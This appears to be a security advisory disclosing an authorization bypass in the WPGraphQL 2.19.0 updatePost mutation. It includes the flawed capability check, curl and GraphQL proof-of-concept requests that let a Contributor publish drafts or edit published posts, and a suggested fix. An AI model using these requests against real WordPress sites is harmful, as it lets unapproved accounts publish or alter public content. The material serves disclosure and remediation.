WPGraphQL 2.19.0 contains an authorization bypass in the updatePost mutation. An authenticated WordPress Contributor can change one of their own draft posts to PUBLISH despite lacking the publish_posts capability. The same mutation also permits the Contributor to modify their own previously published posts despite lacking edit_published_posts and failing WordPress's object-level edit_post capability check.
This bypasses the standard WordPress editorial workflow. The WordPress REST API correctly rejects the equivalent operations for the same user.
wp-graphql2.19.07.0.2Only version 2.19.0 is claimed as confirmed because that is the version tested. The same authorization pattern appears in earlier source history, but those releases were not independently tested.
src/Mutation/PostObjectUpdate.php checks only the post type's collection-level edit_posts capability:
if ( ! isset( $post_type_object->cap->edit_posts ) || ! current_user_can( $post_type_object->cap->edit_posts ) ) {
// Reject request.
}
It separately prevents a user from changing another author's post, but it does not perform WordPress's object-level check:
current_user_can( $post_type_object->cap->edit_post, $post_id )
It also does not check publish_posts when the requested update changes the post status to publish. The mutation passes the requested status directly to wp_update_post(), which expects its caller to have already enforced authorization.
By comparison, WPGraphQL's createPost implementation explicitly checks publish_posts and changes an unauthorized requested status to pending. This protection is absent from updatePost.
/graphql, for example with an Application Password over HTTPS or with their WordPress login cookie and a valid wp_graphql/wp_rest nonce.No administrator action beyond assigning the standard Contributor role is required. The Contributor role has edit_posts, but does not have publish_posts or edit_published_posts.
The following requests use an Application Password for concise remote reproduction. Replace the URL, username, and Application Password with values from the test installation. WordPress Application Passwords should be tested over HTTPS.
curl --user 'gql_contributor:APPLICATION_PASSWORD' \
-H 'Content-Type: application/json' \
--data-binary '{"query":"mutation { createPost(input:{title:\"Contributor publication bypass test\", content:\"Created by a Contributor and not reviewed by an editor.\", status:DRAFT}) { post { databaseId title status } } }"}' \
'https://wordpress.example/graphql'
Example response:
{
"data": {
"createPost": {
"post": {
"databaseId": 21,
"title": "Contributor publication bypass test",
"status": "draft"
}
}
}
}
Record the returned databaseId. The example below uses 21.
Using the same Contributor credentials, attempt to publish the draft through the WordPress REST API:
curl --user 'gql_contributor:APPLICATION_PASSWORD' \
-H 'Content-Type: application/json' \
--data-binary '{"status":"publish"}' \
'https://wordpress.example/wp-json/wp/v2/posts/21'
Expected control response:
{
"code": "rest_cannot_publish",
"message": "Sorry, you are not allowed to publish posts.",
"data": {
"status": 403
}
}
This establishes that the Contributor lacks the WordPress capability required for the operation.
curl --user 'gql_contributor:APPLICATION_PASSWORD' \
-H 'Content-Type: application/json' \
--data-binary '{"query":"mutation { updatePost(input:{id:\"21\", status:PUBLISH}) { post { databaseId title status uri } } }"}' \
'https://wordpress.example/graphql'
Observed response on WPGraphQL 2.19.0:
{
"data": {
"updatePost": {
"post": {
"databaseId": 21,
"title": "Contributor publication bypass test",
"status": "publish",
"uri": "/contributor-publication-bypass-test/"
}
}
}
}
The post is now publicly accessible without editorial approval.
Open the returned uri without authentication, or query it without credentials:
curl -H 'Content-Type: application/json' \
--data-binary '{"query":"query { post(id:\"21\", idType:DATABASE_ID) { databaseId title status uri } }"}' \
'https://wordpress.example/graphql'
The post is returned with status publish.
If an editor previously published a post owned by the Contributor, WordPress no longer allows that Contributor to edit it because Contributors lack edit_published_posts. Nevertheless, the following mutation changes its title and content:
mutation {
updatePost(input: {
id: "PUBLISHED_POST_DATABASE_ID"
title: "Unauthorized change after editorial approval"
content: "The Contributor can replace previously approved content."
}) {
post {
databaseId
title
status
}
}
}
In live testing, the REST API returned 403 rest_cannot_edit for this operation while WPGraphQL returned the modified published post.
A compromised or malicious Contributor account can bypass the site's editorial approval boundary and:
The issue affects the integrity of public site content and can affect availability of posts authored by the attacker. It does not allow modification of another author's posts, role escalation, administrator access, arbitrary code execution, or direct access to secrets. Normal WordPress content sanitization still applies to the Contributor's submitted HTML.
Before updating a post, enforce the post type's object-level meta capability with the target post ID, equivalent to WordPress REST behavior:
if (
! isset( $post_type_object->cap->edit_post ) ||
! current_user_can( $post_type_object->cap->edit_post, $post_id )
) {
throw new UserError( /* authorization error */ );
}
Status transitions should also enforce the relevant post type capabilities. In particular, changing a post to a public/future status should require the post type's publish_posts capability. Tests should cover at least:
pending.{
"cwe_ids": [
"CWE-863"
],
"github_reviewed": true,
"github_reviewed_at": "2026-09-23T14:13:04Z",
"nvd_published_at": null,
"severity": "MODERATE"
}